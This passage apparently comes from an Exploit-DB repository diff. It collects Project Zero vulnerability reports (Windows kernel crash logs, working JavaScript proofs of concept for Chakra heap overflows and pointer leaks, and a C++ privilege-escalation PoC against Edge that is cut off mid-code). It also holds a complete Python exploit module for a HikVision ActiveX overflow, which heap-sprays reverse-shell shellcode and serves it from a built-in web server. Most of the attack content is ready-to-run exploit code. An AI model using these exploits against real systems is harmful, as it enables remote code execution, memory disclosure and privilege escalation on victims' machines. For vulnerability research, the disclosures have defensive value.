9b7e3474 829092a7 0000008e c0000005 8e70bba3 nt!KeBugCheckEx+0x1e
9b7e3a14 828929a6 9b7e3a30 00000000 9b7e3a84 nt!KiDispatchException+0x1ac
9b7e3a7c 8289295a 9b7e3af8 8e70bba3 badb0d00 nt!CommonDispatchException+0x4a
9b7e3af8 8e70bbe6 ff73a000 fb77cd28 9b7e3b20 nt!Kei386EoiHelper+0x192
9b7e3b08 8e7ef63d ff73a010 8e7ef5c0 fb784cf0 win32k!EngFreeMem+0x16
9b7e3b20 8e7ef67c fa42ce78 9b7e3b98 9b7e3b3c win32k!ttfdCloseFontContext+0x51
9b7e3b30 8e7ef5d8 fb784cf0 9b7e3b74 8e7ef1f8 win32k!ttfdDestroyFont+0x16
9b7e3b3c 8e7ef1f8 fb784cf0 fe38ccf0 9b7e3bd8 win32k!ttfdSemDestroyFont+0x18
9b7e3b74 8e7ef41b fb784cf0 fe38ccf0 00000000 win32k!PDEVOBJ::DestroyFont+0x67
9b7e3ba4 8e7749c3 00000000 00000000 00000001 win32k!RFONTOBJ::vDeleteRFONT+0x33
9b7e3bcc 8e77660f 9b7e3bf0 fb784cf0 00000000 win32k!vRestartKillRFONTList+0x8d
9b7e3c00 8e84100e 00000006 fb284fc0 8eaf8fc8 win32k!PFTOBJ::bUnloadWorkhorse+0x15f
9b7e3c28 82891dc6 0500019c 002cf9cc 76e26bf4 win32k!GreRemoveFontMemResourceEx+0x60
9b7e3c28 76e26bf4 0500019c 002cf9cc 76e26bf4 nt!KiSystemServicePostCall
002cf9cc 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
And:
---
PAGE_FAULT_IN_FREED_SPECIAL_POOL (cc)
Memory was referenced after it was freed.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fc1ffa54, memory referenced
Arg2: 00000001, value 0 = read operation, 1 = write operation
Arg3: 82848a05, if non-zero, the address which referenced memory.
Arg4: 00000000, Mm internal code.
Debugging Details:
------------------
WRITE_ADDRESS: fc1ffa54 Special pool
FAULTING_IP:
nt!memset+45
82848a05 f3ab rep stos dword ptr es:[edi]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0xCC
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 8fb73d58 -- (.trap 0xffffffff8fb73d58)
ErrCode = 00000002
eax=00000000 ebx=00000001 ecx=00000001 edx=00000000 esi=00000004 edi=fc1ffa54
eip=82848a05 esp=8fb73dcc ebp=8fb73e28 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
nt!memset+0x45:
82848a05 f3ab rep stos dword ptr es:[edi]
Resetting default scope
LAST_CONTROL_TRANSFER: from 828eed87 to 8288a978
STACK_TEXT:
8fb738ac 828eed87 00000003 766f335a 00000065 nt!RtlpBreakWithStatusInstruction
8fb738fc 828ef885 00000003 00000000 0000000a nt!KiBugCheckDebugBreak+0x1c
8fb73cc0 8289d94d 00000050 fc1ffa54 00000001 nt!KeBugCheck2+0x68b
8fb73d40 8284ffa8 00000001 fc1ffa54 00000000 nt!MmAccessFault+0x104
8fb73d40 82848a05 00000001 fc1ffa54 00000000 nt!KiTrap0E+0xdc
8fb73dcc 8f15cca0 fc1ffa54 00000000 00000004 nt!memset+0x45
8fb73e28 8f050c00 0000000b 00000004 c0000002 win32k!sbit_Embolden+0x34d
8fb73e68 8efc3e10 fb972fd0 fc200ea0 faec6040 win32k!sbit_GetBitmap+0x18c
8fb73eb4 8efc9ff1 fc200010 fc20007c faec6040 win32k!fs_ContourScan+0x192
8fb73ff8 8efbef89 00000028 00000020 faec6000 win32k!lGetGlyphBitmap+0x1aa
8fb74020 8efbedd6 00000000 00000001 00000020 win32k!ttfdQueryFontData+0x15e
8fb74070 8efbdff2 fbf98010 fa794cf0 00000001 win32k!ttfdSemQueryFontData+0x45
8fb740b8 8f14eef5 fbf98010 fa794cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8fb740e8 8f14ef48 fc586f20 ffa84130 8fb74114 win32k!RFONTOBJ::bInsertGlyphbitsLookaside+0xa7
8fb740f8 8f050663 0000000a fc586f20 8fb74798 win32k!RFONTOBJ::cGetGlyphDataLookaside+0x1c
8fb74114 8f03b2fc 8fb74798 8fb74148 8fb74144 win32k!STROBJ_bEnum+0x6c
8fb7414c 8f03b4d9 00000001 8fb74358 00000d0d win32k!GetTempTextBufferMetrics+0x61
8fb743d4 8ee34042 fc1cadb8 8fb74798 fa794cf0 win32k!EngTextOut+0x26
WARNING: Stack unwind information not available. Following frames may be wrong.
8fb74410 8f13cce0 fb16edb8 8fb74798 fa794cf0 VBoxDisp+0x4042
8fb7446c 8f03dbcb fef7cc90 8fb74798 fa794cf0 win32k!WatchdogDrvTextOut+0x51
8fb744b8 8f03de38 8f13cc8f 8fb74724 fb16edb8 win32k!OffTextOut+0x71
8fb7473c 8f03d9a8 fb16edb8 8fb74798 fa794cf0 win32k!SpTextOut+0x1a2
8fb74a38 8efcc2d4 8fb74bfc fc0b8e20 fc0b8e7c win32k!GreExtTextOutWLocked+0x1040
8fb74ab4 8f01f251 00000000 ff7bf064 00001000 win32k!GreBatchTextOut+0x1e6
8fb74c24 8284cd5c 000000bc 001afd88 001afdb4 win32k!NtGdiFlushUserBatch+0x123
8fb74c34 76f16bf3 badb0d00 001afd88 00000000 nt!KiSystemServiceAccessTeb+0x10
8fb74c38 badb0d00 001afd88 00000000 00000000 ntdll!KiFastSystemCall+0x3
8fb74c3c 001afd88 00000000 00000000 00000000 0xbadb0d00
8fb74c40 00000000 00000000 00000000 00000000 0x1afd88
---
While the two above crashes look differently, we believe they manifest a single security issue, as they occur interchangeably with our proof of concept files. The first one is a NULL pointer dereference while performing a list unlinking operation, while the second is an attempt to write to memory which has already been freed, and they both indicate a use-after-free condition. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "OS/2" and "VDMX" tables.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes. It is also required for the "Adjust for best performance" option to be set in "System > Advanced system settings > Advanced > Performance > Settings", most likely due to the "Smooth edges of screen fonts" getting unchecked.
Attached is an archive with three proof of concept font files.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40599.zip

50
platforms/windows/dos/40600.txt Executable file
View file

@ -0,0 +1,50 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=873
We have encountered Windows kernel crashes in the memmove() function called by nt!CmpCheckValueList while loading corrupted registry hive files. An example of a crash log excerpt generated after triggering the bug is shown below:
---
ATTEMPTED_WRITE_TO_READONLY_MEMORY (be)
An attempt was made to write to readonly memory. The guilty driver is on the
stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: b008d000, Virtual address for the attempted write.
Arg2: 45752121, PTE contents.
Arg3: a5d9b590, (reserved)
Arg4: 0000000b, (reserved)
Debugging Details:
------------------
[...]
STACK_TEXT:
a5d9b60c 81820438 b008cb40 b008cb44 fffffffc nt!memmove+0x33
a5d9b670 8181f4f0 ab3709c8 00000000 b008cb34 nt!CmpCheckValueList+0x520
a5d9b6bc 8181fc01 03010001 0000b3b8 00000020 nt!CmpCheckKey+0x661
a5d9b6f4 818206d0 ab3709c8 03010001 00000001 nt!CmpCheckRegistry2+0x89
a5d9b73c 8182308f 03010001 8000057c 80000498 nt!CmCheckRegistry+0xfb
a5d9b798 817f6fa0 a5d9b828 00000002 00000000 nt!CmpInitializeHive+0x55c
a5d9b85c 817f7d85 a5d9bbb8 00000000 a5d9b9f4 nt!CmpInitHiveFromFile+0x1be
a5d9b9c0 817ffaae a5d9bbb8 a5d9ba88 a5d9ba0c nt!CmpCmdHiveOpen+0x50
a5d9bacc 817f83b8 a5d9bb90 a5d9bbb8 00000010 nt!CmLoadKey+0x459
a5d9bc0c 8168edc6 0025fd58 00000000 00000010 nt!NtLoadKeyEx+0x56c
a5d9bc0c 77806bf4 0025fd58 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0025fdc0 00000000 00000000 00000000 00000000 0x77806bf4
---
The root cause of the bug seems to be that the nt!CmpCheckValueList function miscalculates the number of items to be shifted to the left in an array with 4-byte entries, resulting in the following call:
RtlMoveMemory(&array[x], &array[x + 1], 4 * (--y - x));
Here, the eventual value of the size parameter becomes negative (--y is smaller than x), but is treated by RtlMoveMemory as an unsigned integer, which is way beyond the size of the memory region, resulting in memory corruption. In a majority of observed cases, the specific negative value ended up being 0xfffffffc (-4), but we have also seen a few samples which crashed with size=0xfffffff8 (-8).
The issue reproduces on Windows 7. Considering the huge memory copy size, the crash should manifest both with and without Special Pools enabled. In order to reproduce the problem with the provided samples, it is necessary to load them with a dedicated program which calls the RegLoadAppKey() API.
Attached are three proof of concept hive files.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40600.zip

56
platforms/windows/dos/40601.txt Executable file
View file

@ -0,0 +1,56 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=876
We have encountered a Windows kernel crash in the nt!RtlValidRelativeSecurityDescriptor function invoked by nt!CmpValidateHiveSecurityDescriptors while loading corrupted registry hive files. An example of a crash log excerpt generated after triggering the bug is shown below:
---
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
This is a very common bugcheck. Usually the exception address pinpoints
the driver/function that caused the problem. Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003. This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG. This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG. This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 81815974, The address that the exception occurred at
Arg3: 80795644, Trap Frame
Arg4: 00000000
Debugging Details:
------------------
[...]
STACK_TEXT:
807956c4 81814994 a4f3f098 0125ffff 00000000 nt!RtlValidRelativeSecurityDescriptor+0x5b
807956fc 818146ad 03010001 80795728 80795718 nt!CmpValidateHiveSecurityDescriptors+0x24b
8079573c 8181708f 03010001 80000560 80000540 nt!CmCheckRegistry+0xd8
80795798 817eafa0 80795828 00000002 00000000 nt!CmpInitializeHive+0x55c
8079585c 817ebd85 80795bb8 00000000 807959f4 nt!CmpInitHiveFromFile+0x1be
807959c0 817f3aae 80795bb8 80795a88 80795a0c nt!CmpCmdHiveOpen+0x50
80795acc 817ec3b8 80795b90 80795bb8 00000010 nt!CmLoadKey+0x459
80795c0c 81682dc6 002afc90 00000000 00000010 nt!NtLoadKeyEx+0x56c
80795c0c 77066bf4 002afc90 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
002afcf8 00000000 00000000 00000000 00000000 0x77066bf4
[...]
FOLLOWUP_IP:
nt!RtlValidRelativeSecurityDescriptor+5b
81815974 803801 cmp byte ptr [eax],1
---
The bug seems to be caused by insufficient verification of the security descriptor length passed to the nt!RtlValidRelativeSecurityDescriptor function. An inadequately large length can render the verification of any further offsets useless, which is what happens in this particular instance. Even though the nt!RtlpValidateSDOffsetAndSize function is called to sanitize each offset in the descriptor used to access memory, it returns success due to operating on falsely large size. This condition can be leveraged to get the kernel to dereference any address relative to the pool allocation, which may lead to system crash or disclosure of kernel-mode memory. We have not investigated if the bug may allow out-of-bounds memory write access, but if that is the case, its severity would be further elevated.
The issue reproduces on Windows 7 and 8.1. In order to reproduce the problem with the provided sample, it is necessary to load it with a dedicated program which calls the RegLoadAppKey() API.
Attached is a proof of concept hive file.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40601.zip

97
platforms/windows/dos/40602.html Executable file
View file

@ -0,0 +1,97 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=923
There is a heap overflow in Array.map in Chakra. In Js::JavascriptArray::MapHelper, if the array that is being mapped is a Proxy, ArraySpeciesCreate is used to create the array that the mapped values are copied into. They are then written to the array using DirectSetItemAt, even through there is no guarantee the array is a Var array. If it is actually an int array, it will be shorter than this function expects, causing a heap overflow. A minimal PoC is as follows:
var d = new Array(1,2,3);
class dummy{
constructor(){
alert("in constructor");
return d;
}
}
var handler = {
get: function(target, name){
if(name == "length"){
return 0x100;
}
return {[Symbol.species] : dummy};
},
has: function(target, name){
return true;
}
};
var p = new Proxy([], handler);
var a = new Array(1,2,3);
function test(){
return 0x777777777777;
}
var o = a.map.call(p, test);
A full PoC is attached.
-->
<html><body><script>
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
constructor(){
alert("in constructor");
return d;
}
}
var handler = {
get: function(target, name){
if(name == "length"){
return 0x100;
}
return {[Symbol.species] : dummy};
},
has: function(target, name){
alert("has " + name);
return true;
}
};
var p = new Proxy([], handler);
var a = new Array(1,2,3);
function test(){
return 0x777777777777;
}
var o = a.map.call(p, test);
var h = [];
for(item in o){
var n = new Number(o[item]);
if (n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
</script></body></html>

84
platforms/windows/dos/40603.html Executable file
View file

@ -0,0 +1,84 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=920
When Function.apply is called in Chakra, the parameter array is iterated through using JavascriptArray::ForEachItemInRange. This function accepts a templated parameter, hasSideEffect that allows the function to behave safely in the case that iteration has side effects. In JavascriptFunction::CalloutHelper (which is called by Function.apply) this parameter is set to false, even though iterating through the array can have side effects. This can cause an info leak if the side effects cause the array to change types from a numeric array to a variable array. A PoC is as folows and attached. Running this PoC causes an alert dialog with pointers in it.
var t = new Array(1,2,3);
function f(){
var h = [];
var a = [...arguments]
for(item in a){
var n = new Number(a[item]);
if( n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
}
var q = f;
t.length = 20;
var o = {};
Object.defineProperty(o, '3', {
get: function() {
var ta = [];
ta.fill.call(t, "natalie");
return 5;
}
});
t.__proto__ = o;
var j = [];
var s = f.apply(null, t);
-->
<html><body><script>
var t = new Array(1,2,3);
function f(){
var h = [];
var a = [...arguments]
for(item in a){
var n = new Number(a[item]);
if( n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
}
var q = f;
t.length = 20;
var o = {};
Object.defineProperty(o, '3', {
get: function() {
var ta = [];
ta.fill.call(t, "natalie");
return 5;
}
});
t.__proto__ = o;
var j = [];
var s = f.apply(null, t);
</script></body></html>

67
platforms/windows/dos/40604.html Executable file
View file

@ -0,0 +1,67 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=919
When an array is joined in Chakra, it calls JavascriptArray::JoinArrayHelper, a function that is templated based on the type of the array. This function then calls JavascriptArray::TemplatedGetItem to get each item in the array. If an element is missing from the array, this function will fall back to the array object's prototype, which could contain a getter or a proxy, allowing user script to be executed. This script can have side effects, including changing the type of the array, however JoinArrayHelper will continue running as it's templated type even if this has happened. This can allow object pointers in an array to be read as integers and accessed by a malicious script.
A minimal PoC is as follows:
var t = new Array(1,2,3);
t.length = 100;
var o = {};
Object.defineProperty(o, '3', {
get: function() {
t[0] = {};
for(var i = 0; i < 100; i++){
t[i] = {a : i};
}
return 7;
}
});
t.__proto__ = o;
var j = [];
var s = j.join.call(t);
alert(s);
A full PoC is attached. One of the alert dialogs contains pointers to JavaScript objects.
-->
<html><body><script>
var y = 0;
var t = new Array(1,2,3);
t.length = 100;
var o = {};
Object.defineProperty(o, '3', {
get: function() {
alert('get!');
t[0] = {};
var j = [];
for(var i = 0; i < 100; i++){
t[i] = {a : i};
}
return 7;
}
});
t.__proto__ = o;
var j = [];
var s = j.join.call(t);
alert(s);
var a = s.split(",");
var h = [];
for(item in a){
var n = parseInt(a[item]);
if (n < 0){
n = n + 0x100000000;
}
var ss = n.toString(16);
h.push(ss);
}
alert(h);
</script></body></html>

117
platforms/windows/dos/40605.html Executable file
View file

@ -0,0 +1,117 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=910
The spread operator in JavaScript allows an array to be treated as function parameters using the following syntax:
var a = [1,2];
f(...a);
This is implemented in the JavascriptFunction::SpreadArgs function in Chakra (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/JavascriptFunction.cpp).
On line 1054 of this function, the following code is used to spread an array:
if (argsIndex + arr->GetLength() > destArgs.Info.Count)
{
AssertMsg(false, "The array length has changed since we allocated the destArgs buffer?");
Throw::FatalInternalError();
}
for (uint32 j = 0; j < arr->GetLength(); j++)
{
Var element;
if (!arr->DirectGetItemAtFull(j, &element))
{
element = undefined;
}
destArgs.Values[argsIndex++] = element;
}
When DirectGetItemAtFull accesses the array, if an element of the array is undefined, it will fall back to the prototype of the array. In some situations, for example if the prototype is a Proxy, this can execute user-defined script, which can change the length of the array, meaning that the call can overflow destArgs.Values, even through the length has already been checked. Note that this check also has a potential integer overflow, which should also probably be fixed as a part of this issue.
A full PoC is attached.
-->
<html>
<script>
var y = 0;
var t = [1,2,3];
var t2 = [4,4,4];
var mp = new Proxy(t2, {
get: function (oTarget, sKey) {
var a = [1,2];
a.reverse();
alert("get " + sKey.toString());
alert(oTarget.toString());
y = y + 1;
if(y == 2){
var temp = [];
oTarget.__proto__ = temp.__proto__;
t.length = 10000;
temp.fill.call(t, 7, 0, 1000);
return 5;
}
return oTarget[sKey] || oTarget.getItem(sKey) || undefined;
},
set: function (oTarget, sKey, vValue) {
alert("set " + sKey);
if (sKey in oTarget) { return false; }
return oTarget.setItem(sKey, vValue);
},
deleteProperty: function (oTarget, sKey) {
alert("delete");
if (sKey in oTarget) { return false; }
return oTarget.removeItem(sKey);
},
enumerate: function (oTarget, sKey) {
alert("enum");
return oTarget.keys();
},
ownKeys: function (oTarget, sKey) {
alert("ok");
return oTarget.keys();
},
has: function (oTarget, sKey) {
alert("has" + sKey);
return true;
},
defineProperty: function (oTarget, sKey, oDesc) {
alert("dp");
if (oDesc && "value" in oDesc) { oTarget.setItem(sKey, oDesc.value); }
return oTarget;
},
getOwnPropertyDescriptor: function (oTarget, sKey) {
alert("fopd");
var vValue = oTarget.getItem(sKey);
return vValue ? {
value: vValue,
writable: true,
enumerable: true,
configurable: false
} : undefined;
},
});
function f(a){
alert(a);
}
var q = f;
t.length = 4;
var o = {};
Object.defineProperty(o, '3', {
get: function() {
alert('get!');
return temperature;
}
});
t.__proto__ = mp;
//t.__proto__.__proto__ = o;
q(...t);
</script>
</html>

195
platforms/windows/local/40578.py Executable file
View file

@ -0,0 +1,195 @@
#!/usr/bin/env python
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
# visit eastfw.com eastexploits.com for more info
import sys
import re
import os
import socket
import random
import string
from struct import pack
sys.path.append("./core")
from Sploit import Sploit
sys.path.append("./shellcodes")
from Shellcodes import OSShellcodes
INFO={}
INFO['NAME']="efa_HikVision_Security_Systems_activex"
INFO['DESCRIPTION']="HikVision Security Systems activex Remote Overflow"
INFO['VENDOR']="http://www.hikvision.com/us/Tools_84.html"
INFO["CVE Name"]="0-day"
INFO["NOTES"]="""
Exploit-db.com information:
# Exploit Title: HikVision Security Systems ActiveX exploit designed for EAST framework
# Google Dork: none
# Date: 19 October 2016
# Exploit Author: EAST framework development team. Yuriy Gurkin
# Vendor Homepage: http://www.hikvision.com/us
# Software Link: http://www.hikvision.com/us/Tools_84.html client software
# Version: v2.5.0.5
# Tested on: Windows XP, 7
# CVE : 0day
General information:
Loaded File: C:\temp\WEBCAM~1\HIKVIS~1\NETVID~1.OCX
Name: NETVIDEOACTIVEX23Lib
Lib GUID: {99F388E9-F788-41D5-A103-8F4961539F88}
Version: 1.0
Lib Classes: 1
Class NetVideoActiveX23
GUID: {CAFCF48D-8E34-4490-8154-026191D73924}
Number of Interfaces: 1
Default Interface: _DNetVideoActiveX23
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
"""
INFO['CHANGELOG']="13 Jan, 2016. Written by Gleg team."
INFO['PATH'] = "Exploits/"
PROPERTY = {}
PROPERTY['DESCRIPTION'] = "ActiveX 0-day"
PROPERTY['MODULE_TYPE'] = "Scada"
# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["CONNECTBACK_PORT"] = "8089"
class exploit(Sploit):
def __init__(self,
port=8089,
logger=None):
Sploit.__init__(self,logger=logger)
self.port = port
self.state = "running"
return
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.port = int(self.args.get('CONNECTBACK_PORT', self.port))
return
def create_shellcode(self):
self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())
if self.args['listener']:
shellcode_type = 'reverse'
port = int(self.args['listener']['PORT'])
else:
port = 9999
shellcode_type = 'command'
self.CONNECTBACK_PORT = port
os_system = os_target = 'WINDOWS'
os_arch = '32bit'
s = OSShellcodes(os_target,
os_arch,
self.CONNECTBACK_IP,
self.CONNECTBACK_PORT)
s.TIMESTAMP = 'codesys'
shellcode = s.create_shellcode(
shellcode_type,
encode=0,
debug=1
)
return shellcode
def make_data(self, shellcode):
filedata="""
<html>
<object classid='clsid:CAFCF48D-8E34-4490-8154-026191D73924' id='target' ></object>
<script type='text/javascript' language="javascript">
ar=new Array();
function spray(buffer) {
var hope = unescape('%u9090%u9090');
var unbuffer = unescape(buffer);
var v = 20 + unbuffer.length;
while(hope.length<v)
hope += hope;
var fk = hope.substring(0, v);
var bk = hope.substring(0, hope.length- v );
delete v;
delete hope;
while(bk.length+v<0x40000) {
bk=bk+bk+fk;
}
for(i=0;i<3500;i++) {
ar[i] = bk + unbuffer;
}
}
spray(<SHELLCODE>);
buffer = "";
for (i = 0; i < 555; i++) buffer += unescape('%u9090%u9090');
target.GetServerIP (buffer);
</script>
</html>
"""
if len(shellcode)%2:
shellcode="\x90"+shellcode
shell="unescape(\""
i = 0
while i < len(shellcode):
shell += "%u"+"%02X%02X" %(ord(shellcode[i+1]),ord(shellcode[i]))
i += 2
shell += "\")"
filedata = filedata.replace("<SHELLCODE>", shell)
return filedata
def run(self):
self.args()
self.log("Generating shellcode")
shellcode = self.create_shellcode()
if not shellcode:
self.log("Something goes wrong")
return 0
self.log("Generate Evil HTML")
html = self.make_data(shellcode)
self.log("Done")
self.log("Starting web server")
ip_server = "0.0.0.0"
crlf = "\r\n"
response = "HTTP/1.1 200 OK" + crlf
response += "Content-Type: text/html" + crlf
response += "Connection: close" + crlf
response += "Server: Apache" + crlf
response += "Content-Length: " + str(len(html))
response += crlf + crlf + html + crlf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = (ip_server, 8089)
s.bind(server)
s.listen(1)
while True:
try:
connection, client_address = s.accept()
data = connection.recv(2048)
self.log("Got request, sending payload")
connection.send(response)
self.log("exploit send")
connection.close()
except:
print("EXCEPT")
self.log('All done')
self.finish(True)
return 1
if __name__ == '__main__':
"""
By now we only have the tool
mode for exploit..
Later we would have
standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1",80)
e.run()

378
platforms/windows/local/40606.cpp Executable file
View file

@ -0,0 +1,378 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=879
Windows: Edge/IE Isolated Private Namespace Insecure DACL EoP
Platform: Windows 10 10586, Edge 25.10586.0.0 not tested 8.1 Update 2 or Windows 7
Class: Elevation of Privilege
Summary:
The isolated private namespace created by ierutils has a insecure DACL which allows any appcontainer process to gain elevated permissions on the namespace directory which could lead to elevation of privilege.
Description:
In iertutils library IsoOpenPrivateNamespace creates a new Window private namespace (which is an isolated object directory which can be referred to using a boundary descriptor). The function calls CreatePrivateNamespace, setting an explicit DACL which gives the current user, ALL APPLICATION PACKAGES and also owner rights of GENERIC_ALL. This is a problem because this is the only security barrier protecting access to the private namespace, when an application has already created it, this means that for example we can from any other App Container open IEs or Edges with Full Access.
Now how would you go about exploiting this? All the resources added to this isolated container use the default DACL of the calling process (which in IEs case is usually the medium broker, and presumably in Edge is MicrosoftEdge.exe). The isolated container then adds explicit Low IL and Package SID ACEs to the created DACL of the object. So one way of exploiting this condition is to open the namespace for WRITE_DAC privilege and add inheritable ACEs to the DACL. When the kernel encounters inherited DACLs it ignores the tokens default DACL and applies the inherited permission.
Doing this would result in any new object in the isolated namespace being created by Edge or IE being accessible to the attacker, also giving write access to resources such as IsoSpaceV2_ScopedTrusted which are not supposed to be writable for example from a sandboxed IE tab. Ive not spent much time actually working out what is or isnt exploitable but at the least youd get some level of information disclosure and no doubt EoP.
Note that the boundary name isnt an impediment to gaining access to the namespace as its something like IEUser_USERSID_MicrosoftEdge or IsoScope_PIDOFBROKER, both of which can be trivially determine or in worse case brute forced. You cant create these namespaces from a lowbox token as the boundary descriptor doesnt have the package SID, but in this case we dont need to care. Im submitted a bug for the other type of issue.
Proof of Concept:
Ive provided a PoC as a C++ source code file. You need to compile it first targeted with Visual Studio 2015. It will look for a copy of MicrosoftEdge.exe and get its PID (this could be done as brute force), it will then impersonate a lowbox token which shouldnt have access to any of Edges isolated namespace and tries to change the DACL of the root namespace object.
NOTE: For some reason this has a habit of causing MicrosoftEdge.exe to die with a security exception especially on x64. Perhaps its checking the DACL somewhere, but I very much doubt it. Ive not worked out if this is some weird memory corruption occurring (although theres a chance it wouldnt be exploitable).
1) Compile the C++ source code file.
2) Start a copy of Edge. You might want to navigate a tab somewhere.
3) Execute the PoC executable as a normal user
4) It should successfully open the namespace and change the DACL.
Expected Result:
Access to the private namespace is not allowed.
Observed Result:
Access to the private namespace is granted and the DACL of the directory has been changed to a set of inherited permissions which will be used.
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <winternl.h>
#include <sddl.h>
#include <memory>
#include <string>
#include <TlHelp32.h>
#include <strstream>
#include <sstream>
typedef NTSTATUS(WINAPI* NtCreateLowBoxToken)(
OUT PHANDLE token,
IN HANDLE original_handle,
IN ACCESS_MASK access,
IN POBJECT_ATTRIBUTES object_attribute,
IN PSID appcontainer_sid,
IN DWORD capabilityCount,
IN PSID_AND_ATTRIBUTES capabilities,
IN DWORD handle_count,
IN PHANDLE handles);
struct HandleDeleter
{
typedef HANDLE pointer;
void operator()(HANDLE handle)
{
if (handle && handle != INVALID_HANDLE_VALUE)
{
DWORD last_error = ::GetLastError();
CloseHandle(handle);
::SetLastError(last_error);
}
}
};
typedef std::unique_ptr<HANDLE, HandleDeleter> scoped_handle;
struct LocalFreeDeleter
{
typedef void* pointer;
void operator()(void* p)
{
if (p)
::LocalFree(p);
}
};
typedef std::unique_ptr<void, LocalFreeDeleter> local_free_ptr;
struct PrivateNamespaceDeleter
{
typedef HANDLE pointer;
void operator()(HANDLE handle)
{
if (handle && handle != INVALID_HANDLE_VALUE)
{
::ClosePrivateNamespace(handle, 0);
}
}
};
struct scoped_impersonation
{
BOOL _impersonating;
public:
scoped_impersonation(const scoped_handle& token) {
_impersonating = ImpersonateLoggedOnUser(token.get());
}
scoped_impersonation() {
if (_impersonating)
RevertToSelf();
}
BOOL impersonation() {
return _impersonating;
}
};
typedef std::unique_ptr<HANDLE, PrivateNamespaceDeleter> private_namespace;
std::wstring GetCurrentUserSid()
{
HANDLE token = nullptr;
if (!OpenProcessToken(::GetCurrentProcess(), TOKEN_QUERY, &token))
return false;
std::unique_ptr<HANDLE, HandleDeleter> token_scoped(token);
DWORD size = sizeof(TOKEN_USER) + SECURITY_MAX_SID_SIZE;
std::unique_ptr<BYTE[]> user_bytes(new BYTE[size]);
TOKEN_USER* user = reinterpret_cast<TOKEN_USER*>(user_bytes.get());
if (!::GetTokenInformation(token, TokenUser, user, size, &size))
return false;
if (!user->User.Sid)
return false;
LPWSTR sid_name;
if (!ConvertSidToStringSid(user->User.Sid, &sid_name))
return false;
std::wstring ret = sid_name;
::LocalFree(sid_name);
return ret;
}
std::wstring GetCurrentLogonSid()
{
HANDLE token = NULL;
if (!::OpenProcessToken(::GetCurrentProcess(), TOKEN_QUERY, &token))
return false;
std::unique_ptr<HANDLE, HandleDeleter> token_scoped(token);
DWORD size = sizeof(TOKEN_GROUPS) + SECURITY_MAX_SID_SIZE;
std::unique_ptr<BYTE[]> user_bytes(new BYTE[size]);
TOKEN_GROUPS* groups = reinterpret_cast<TOKEN_GROUPS*>(user_bytes.get());
memset(user_bytes.get(), 0, size);
if (!::GetTokenInformation(token, TokenLogonSid, groups, size, &size))
return false;
if (groups->GroupCount != 1)
return false;
LPWSTR sid_name;
if (!ConvertSidToStringSid(groups->Groups[0].Sid, &sid_name))
return false;
std::wstring ret = sid_name;
::LocalFree(sid_name);
return ret;
}
class BoundaryDescriptor
{
public:
BoundaryDescriptor()
: boundary_desc_(nullptr) {
}
~BoundaryDescriptor() {
if (boundary_desc_) {
DeleteBoundaryDescriptor(boundary_desc_);
}
}
bool Initialize(const wchar_t* name) {
boundary_desc_ = ::CreateBoundaryDescriptorW(name, 0);
if (!boundary_desc_)
return false;
return true;
}
bool AddSid(LPCWSTR sid_str)
{
if (_wcsicmp(sid_str, L"CU") == 0)
{
return AddSid(GetCurrentUserSid().c_str());
}
else
{
PSID p = nullptr;
if (!::ConvertStringSidToSid(sid_str, &p))
{
return false;
}
std::unique_ptr<void, LocalFreeDeleter> buf(p);
